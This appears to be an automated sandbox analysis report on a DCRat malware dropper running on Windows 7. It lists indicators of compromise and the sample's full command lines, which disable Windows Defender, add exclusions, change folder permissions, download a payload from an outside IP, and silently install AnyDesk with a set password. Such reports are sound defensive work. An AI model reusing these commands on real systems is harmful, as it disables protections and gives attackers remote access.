dcrat | 9a9ac0169117b67557d8ba9932d908df0df543542a649e16db365c2c4d9829cb

Analysis

max time kernel
106s
max time network
171s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
16-01-2023 18:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

5c9360467aba93db8eaa351b62b93afc
SHA1

cef8b31d41b2eb3bd1c1454a96afc43911db85ab
SHA256

b49c294afa4366bf02faccce77dedf2c9ba3d4aa4073c13fe22bd202821d94e6
SHA512

133dc14f6df1d898e968a09d4a60a32345a252031f57bb250674b98b38e338170f9b3e88b00c88acd5f7a3da72d58a078ae52b175af0c6e41e4ccc72f93538cb
SSDEEP

393216:U81/eXkkM7cGGBNpuXKhBqJ0CEZsXVqNIyc2KBcr27eEHTPI:U86MihuXCBe0CEYqNIygdrI

Score

10^/10

dcrat discovery evasion exploit infostealer rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/any.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe

DCRat payload 5 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
C:\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 1744 powershell.exe

flow	pid	process
14	1744	powershell.exe

Executes dropped EXE 19 IoCs

Processes:

1.exeany.exedc.exe1.exewsappz.exeAnyDesk.exemigrate.exeAnyDesk.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeAnyDesk.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.exe

pid	process
1124	1.exe
1672	any.exe
1636	dc.exe
1068	1.exe
1604	wsappz.exe
556	AnyDesk.exe
1548	migrate.exe
796	AnyDesk.exe
1284	Wmiic.exe
1276	Wmiic.exe
464
1812	Wmiic.exe
748	IntelConfigService.exe
832	AnyDesk.exe
1868	Wrap.exe
2080	ApplicationsFrameHost.exe
2156	Superfetch.exe
2172	MSTask.exe
2256	~Ma4650.exe

Possible privilege escalation attempt 11 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
864	takeown.exe
1976	icacls.exe
1264	icacls.exe
1816	icacls.exe
628	icacls.exe
1244	icacls.exe
1964	icacls.exe
1124	icacls.exe
1288	icacls.exe
1332	icacls.exe
1732	icacls.exe

Loads dropped DLL 29 IoCs

Processes:

tmp.execmd.exewsappz.execmd.execmd.exeWmiic.exeIntelConfigService.execmd.exeMSTask.exe~Ma4650.exe

pid	process
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
1716	tmp.exe
588	cmd.exe
1604	wsappz.exe
1044	cmd.exe
1244	cmd.exe
1244	cmd.exe
268
1244	cmd.exe
1352
1248
1812	Wmiic.exe
748	IntelConfigService.exe
992	cmd.exe
748	IntelConfigService.exe
2172	MSTask.exe
2172	MSTask.exe
2172	MSTask.exe
2172	MSTask.exe
2256	~Ma4650.exe
2256	~Ma4650.exe

Modifies file permissions 1 TTPs 11 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1732	icacls.exe
864	takeown.exe
1288	icacls.exe
1332	icacls.exe
1264	icacls.exe
1816	icacls.exe
1244	icacls.exe
1964	icacls.exe
1124	icacls.exe
1976	icacls.exe
628	icacls.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\windows\tasks\IntelConfigService.exe	autoit_exe

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Drops file in Windows directory 22 IoCs

Processes:

migrate.exeIntelConfigService.exeApplicationsFrameHost.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks	IntelConfigService.exe
File opened for modification	C:\Windows\Tasks\config.json	ApplicationsFrameHost.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_7167216	migrate.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	\??\c:\windows\migration\any.exe	powershell.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 11 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2276	timeout.exe
2468	timeout.exe
2536	timeout.exe
1812	timeout.exe
1972	timeout.exe
1008	timeout.exe
968	timeout.exe
1132	timeout.exe
1776	timeout.exe
1068	timeout.exe
2504	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2572 tasklist.exe
1832 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1748 taskkill.exe
1480 taskkill.exe

pid	process
2572	tasklist.exe
1832	tasklist.exe

pid	process
1748	taskkill.exe
1480	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

MSTask.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSTask.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	MSTask.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	MSTask.exe

Modifies registry class 16 IoCs

Processes:

wsappz.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe1.exeicacls.exeicacls.exepowershell.exewsappz.exeAnyDesk.exepowershell.exeIntelConfigService.exepowershell.exeAnyDesk.exeSuperfetch.exe

pid	process
1328	powershell.exe
628	powershell.exe
1124	1.exe
1124	1.exe
1124	1.exe
1124	icacls.exe
1976	icacls.exe
1352	powershell.exe
1604	wsappz.exe
1604	wsappz.exe
556	AnyDesk.exe
1744	powershell.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
764	powershell.exe
748	IntelConfigService.exe
832	AnyDesk.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
2156	Superfetch.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exe1.exeicacls.exetasklist.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exeApplicationsFrameHost.exe

description	pid	process
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	1124	1.exe
Token: SeAssignPrimaryTokenPrivilege	1124	1.exe
Token: SeIncreaseQuotaPrivilege	1124	1.exe
Token: 0	1124	1.exe
Token: SeDebugPrivilege	1976	icacls.exe
Token: SeDebugPrivilege	1832	tasklist.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeLockMemoryPrivilege	2080	ApplicationsFrameHost.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

AnyDesk.exeIntelConfigService.exeApplicationsFrameHost.exeSuperfetch.exe

pid	process
796	AnyDesk.exe
796	AnyDesk.exe
796	AnyDesk.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
748	IntelConfigService.exe
2080	ApplicationsFrameHost.exe
2156	Superfetch.exe
2156	Superfetch.exe
2156	Superfetch.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDesk.exe

pid process

796 AnyDesk.exe
796 AnyDesk.exe
796 AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exedc.exeany.execmd.exenet.exe

description	pid	process	target process
PID 1716 wrote to memory of 1328	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 1328	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 1328	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 1328	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 628	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 628	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 628	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 628	1716	tmp.exe	powershell.exe
PID 1716 wrote to memory of 1124	1716	tmp.exe	1.exe
PID 1716 wrote to memory of 1124	1716	tmp.exe	1.exe
PID 1716 wrote to memory of 1124	1716	tmp.exe	1.exe
PID 1716 wrote to memory of 1124	1716	tmp.exe	1.exe
PID 1716 wrote to memory of 1008	1716	tmp.exe	cmd.exe
PID 1716 wrote to memory of 1008	1716	tmp.exe	cmd.exe
PID 1716 wrote to memory of 1008	1716	tmp.exe	cmd.exe
PID 1716 wrote to memory of 1008	1716	tmp.exe	cmd.exe
PID 1716 wrote to memory of 1672	1716	tmp.exe	any.exe
PID 1716 wrote to memory of 1672	1716	tmp.exe	any.exe
PID 1716 wrote to memory of 1672	1716	tmp.exe	any.exe
PID 1716 wrote to memory of 1672	1716	tmp.exe	any.exe
PID 1716 wrote to memory of 1636	1716	tmp.exe	dc.exe
PID 1716 wrote to memory of 1636	1716	tmp.exe	dc.exe
PID 1716 wrote to memory of 1636	1716	tmp.exe	dc.exe
PID 1716 wrote to memory of 1636	1716	tmp.exe	dc.exe
PID 1008 wrote to memory of 1044	1008	cmd.exe	cmd.exe
PID 1008 wrote to memory of 1044	1008	cmd.exe	cmd.exe
PID 1008 wrote to memory of 1044	1008	cmd.exe	cmd.exe
PID 1008 wrote to memory of 1044	1008	cmd.exe	cmd.exe
PID 1044 wrote to memory of 1812	1044	cmd.exe	chcp.com
PID 1044 wrote to memory of 1812	1044	cmd.exe	chcp.com
PID 1044 wrote to memory of 1812	1044	cmd.exe	chcp.com
PID 1044 wrote to memory of 1812	1044	cmd.exe	chcp.com
PID 1636 wrote to memory of 1120	1636	dc.exe	WScript.exe
PID 1636 wrote to memory of 1120	1636	dc.exe	WScript.exe
PID 1636 wrote to memory of 1120	1636	dc.exe	WScript.exe
PID 1636 wrote to memory of 1120	1636	dc.exe	WScript.exe
PID 1044 wrote to memory of 1952	1044	cmd.exe	cmd.exe
PID 1044 wrote to memory of 1952	1044	cmd.exe	cmd.exe
PID 1044 wrote to memory of 1952	1044	cmd.exe	cmd.exe
PID 1044 wrote to memory of 1952	1044	cmd.exe	cmd.exe
PID 1044 wrote to memory of 1988	1044	cmd.exe	findstr.exe
PID 1044 wrote to memory of 1988	1044	cmd.exe	findstr.exe
PID 1044 wrote to memory of 1988	1044	cmd.exe	findstr.exe
PID 1044 wrote to memory of 1988	1044	cmd.exe	findstr.exe
PID 1672 wrote to memory of 964	1672	any.exe	cmd.exe
PID 1672 wrote to memory of 964	1672	any.exe	cmd.exe
PID 1672 wrote to memory of 964	1672	any.exe	cmd.exe
PID 1672 wrote to memory of 964	1672	any.exe	cmd.exe
PID 1044 wrote to memory of 1976	1044	cmd.exe	icacls.exe
PID 1044 wrote to memory of 1976	1044	cmd.exe	icacls.exe
PID 1044 wrote to memory of 1976	1044	cmd.exe	icacls.exe
PID 1044 wrote to memory of 1976	1044	cmd.exe	icacls.exe
PID 964 wrote to memory of 764	964	cmd.exe	chcp.com
PID 964 wrote to memory of 764	964	cmd.exe	chcp.com
PID 964 wrote to memory of 764	964	cmd.exe	chcp.com
PID 964 wrote to memory of 764	964	cmd.exe	chcp.com
PID 964 wrote to memory of 664	964	cmd.exe	net.exe
PID 964 wrote to memory of 664	964	cmd.exe	net.exe
PID 964 wrote to memory of 664	964	cmd.exe	net.exe
PID 964 wrote to memory of 664	964	cmd.exe	net.exe
PID 664 wrote to memory of 1328	664	net.exe	net1.exe
PID 664 wrote to memory of 1328	664	net.exe	net1.exe
PID 664 wrote to memory of 1328	664	net.exe	net1.exe
PID 664 wrote to memory of 1328	664	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:1952

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:1988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
PID:1976

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1648

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:864

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1812

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious behavior: EnumeratesProcesses
PID:1124

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1288

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1332

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1264

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1816

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:628

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1972

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1548

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\tasks\run.bat" "
5⤵
- Loads dropped DLL
PID:1244

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:968

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1068

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
- Executes dropped EXE
PID:1284

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
6⤵
- Executes dropped EXE
PID:1276

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1132

C:\Windows\SysWOW64\net.exe
net start WMService
6⤵
PID:1928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
7⤵
PID:588

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2468

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2536

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:2580

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:2572

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:764

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:1328

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
PID:1000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:1788

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:1776

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
- Loads dropped DLL
PID:588

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1604

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
5⤵
PID:2068

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:832

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:2336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
5⤵
PID:2384

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:2556

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:2564

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
PID:1120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
1⤵
PID:824

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:556

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:796

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1812

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:748

C:\Windows\system32\cmd.exe
